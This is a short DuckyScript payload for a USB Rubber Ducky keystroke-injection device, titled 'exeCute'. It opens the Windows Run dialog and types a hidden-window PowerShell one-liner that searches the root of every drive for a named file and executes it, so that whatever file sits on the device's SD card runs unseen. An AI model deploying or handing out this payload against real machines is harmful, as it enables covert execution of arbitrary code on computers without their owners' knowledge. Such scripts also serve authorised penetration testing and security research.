REM Author: stan
REM Name: exeCute
REM Purpose: Run any file from the rubber ducky (twin) SD
DELAY 3000
GUI r
DELAY 100
REM Get root folder of every drive and check if FILENAME exist
REM If yes execute it
STRING powershell -WindowStyle hidden (gdr).root|%{if(ls "$_`FILENAME*"){& $_`FILENAME*}}
ENTER